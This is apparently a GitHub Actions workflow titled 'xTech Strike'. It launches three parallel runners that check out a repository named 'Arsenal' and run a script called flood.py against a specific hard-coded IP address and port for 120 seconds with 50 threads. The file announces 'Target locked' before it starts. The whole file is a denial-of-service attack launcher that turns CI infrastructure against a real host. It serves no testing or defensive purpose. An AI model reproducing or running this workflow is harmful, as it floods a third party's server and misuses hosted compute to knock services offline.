name: xTech Strike

on:
  workflow_dispatch:

jobs:
  strike:
    runs-on: ubuntu-latest
    strategy:
      matrix:
        instance: [1, 2, 3]
    steps:
      - name: Checkout Arsenal
        uses: actions/checkout@v4
      - name: Setup Python
        uses: actions/setup-python@v5
        with:
          python-version: '3.11'
      - name: Execute Flood on Target
        run: |
          echo "[xTech] Target locked: 77.110.105.224:8303"
          python flood.py -i 77.110.105.224 -p 8303 -t 120 -th 50
